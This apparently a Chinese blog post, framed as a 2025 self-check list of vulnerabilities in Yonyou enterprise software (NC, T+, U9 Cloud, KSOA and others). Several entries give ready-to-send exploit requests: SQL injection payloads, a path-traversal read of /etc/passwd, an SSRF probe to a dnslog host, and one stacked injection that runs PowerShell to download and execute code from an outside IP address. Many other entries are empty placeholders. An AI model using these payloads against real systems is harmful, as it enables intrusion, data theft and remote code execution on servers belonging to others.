用友相关漏洞自查表(2025年)

  1. 用友NC listUserSharingEvents 存在SQL注入

    1. 漏洞类型:SQL注入
    2. 利用路径:/portal/pt/oacoSchedulerEvents/listUserSharingEvents
    3. 验证方式:/portal/pt/oacoSchedulerEvents/listUserSharingEvents?agent=6')+AND+1=UTL_INADDR.GET_HOST_ADDRESS('~'||(user)||'~')--&pageId=login&sch_ed=2&sch_sd=1

  2. 用友bip远程代码执行

    1. 漏洞类型:RCE
    2. 利用路径:待补充
    3. 验证方式:待补充

  3. 用友 畅捷通T+InitContext处存在登录绕过漏洞

    1. 漏洞类型:越权
    2. 利用路径:待补充
    3. 验证方式:待补充

  4. 用友 畅捷通T+GetAll处存在敏感信息泄露漏洞

    1. 漏洞类型:信息泄露
    2. 利用路径:待补充
    3. 验证方式:待补充

  5. 用友 畅捷通CRM newleadset.php 存在SQL注入

    1. 漏洞类型:SQL注入
    2. 利用路径:/lead/newleadset.php
    3. 验证方式:/lead/newleadset.php?gblOrgID=1+AND+%28SELECT+5244+FROM+%28SELECT%28SLEEP%289%29%29%29HAjH%29--+-&DontCheckLogin=1

  6. 用友 畅捷通T+Load处存在SQL注入

    1. 漏洞类型:SQL注入
    2. 利用路径://tplus/UFAQD/KeyInfoList.aspx
    3. 验证方式://tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=%27);declare%20%40shell%20int%3Bexec%20sp_oacreate%20%22wscript.shell%22%2C%40shell%20output%3Bexec%20sp_oamethod%20%40shell%2C%22run%22%2Cnull%2C%22sqlps%20IEX%20((new-object%20net.webclient).downloadstring('http%3A%2F%2F103.199.106.62%3A6000%2Fbeta'))%22%3b--+

  7. 用友 畅捷通T+ keyEdit.aspx 存在SQL注入

    1. 漏洞类型:SQL注入
    2. 利用路径:/tplus/UFAQD/keyEdit.aspx
    3. 验证方式:GET /tplus/UFAQD/keyEdit.aspx?KeyID=222%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1

  8. 用友 畅捷通AddressSettingController存在SSRF

    1. 漏洞类型:SSRF
    2. 利用路径:/tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx
    3. 验证方式: 
      POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=sfzg0pgxvld3ltgimecqkjg4; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721822405; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721822415; HMACCOUNT=AFE08148BD092161
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

{
  "address":"bftsce.dnslog.cn"
}

       

  9. 用友畅捷通TPLUS AccountClearControler SQL注入

    1. 漏洞类型:SQL注入
    2. 漏洞路径:/tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx
    3. 验证方式:/tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx?method=GetisInitBCRetail

  10. 用友时空KSOA SQL注入

    1. 漏洞类型:SQL注入
    2. 漏洞路径:/worksheet/workslist.jsp
    3. 验证方式:/worksheet/workslist.jsp?id=1';WAITFOR+DELAY+'0:0:3

  11. 用友NC deleteEvent SQL注入

    1. 漏洞类型:SQL注入
    2. 漏洞路径:/portal/pt/oacoSchedulerEvents/deleteEvent
    3. 验证方式:待确认

  12. 用友NC getFormItem doPost SQL注入

    1. 漏洞类型:SQL注入
    2. 漏洞路径:/portal/pt/servlet/getFormItem/doPost
    3. 验证方式: 
      POST /portal/pt/servlet/getFormItem/doPost?pageId=login&clazz=nc.uap.wfm.vo.base.ProDefBaseVO&proDefPk=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 19

        

  13. 用友U9 Cloud print/DynamaticExport.aspx 接口任意文件下载

    1. 漏洞类型:任意文件读取
    2. 漏洞路径:/Portal/Print/DynamaticExport.aspx
    3. 验证方式:/Portal/Print/DynamaticExport.aspx?filePath=../../etc/passwd

  14. 用友Nccloud系统反序列化漏洞

    1. 漏洞类型:
    2. 漏洞路径:
    3. 验证方式:

  15. 用友 NC IMetaWebService4BqCloud 数据源 SQL 注入

    1. 漏洞类型:SQL注入
    2. 漏洞路径:/uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud
    3. 验证方式: 
      POST /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud HTTP/1.1
      Cache-Control: max-age=0
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Encoding: gzip, deflate, br
      Accept-Language: zh-CN,zh;q=0.9
      Cookie: JSESSIONID=09133CFE3A7B0CE8341AB1A7DEDFCCDE.server
      Connection: keep-aliveSOAP
      Action: urn:loadFields
      Content-Type: text/xml;charset=UTF-8
      Host: 
      Content-Length: 350

      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imet="http://meta.ae.pubitf.uap/IMetaWebService4BqCloud">
      <soapenv:Header/>
      <soapenv:Body>
      <imet:loadFields>         <!--type: string-->         
      <imet:string>SmartModel^1';*</imet:string>      
      </imet:loadFields>   
      </soapenv:Body>
      </soapenv:Envelope>

        

  16. 用友 U9 Cloud 远程代码执行

    1. 漏洞类型:RCE
    2. 漏洞路径:MachineKey硬编码
    3. 验证方式:MachineKey硬编码,构造ViewState反序列化

  17. 用友YonBIP(R6旗舰版)任意用户密码重置

    1. 漏洞类型:越权
    2. 漏洞路径:待确认
    3. 验证方式:待确认

  18. 用友 U9 Cloud PDFDirectPrint.aspx 反序列化

    1. 漏洞类型:反序列化
    2. 漏洞路径:待确认
    3. 验证方式:待确认

  19. 用友u8 cloud QuerySoapServlet 存在SQL注入

    1. 漏洞类型:SQL注入
    2. 漏洞路径:QuerySoapServlet
    3. 验证方式:待确认

  20. 用友nmc服务任意文件上传

    1. 漏洞类型:文件上传
    2. 漏洞路径:待确认
    3. 验证方式:待确认

  21. 用友NC baplink SQL注入

    1. 漏洞类型:SQL注入
    2. 漏洞路径:/portal/pt/baplink/content
    3. 验证方式: 
      GET /portal/pt/baplink/content?pageId=login&pk_funnode=-1* HTTP/1.1
Host: 
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Accept: text/html, image/gif, image/jpeg, ; q=.2, /; q=.2

        

 

posted @ 2025-07-27 10:49  r1ch4rd_L  阅读(335)  评论(0)    收藏  举报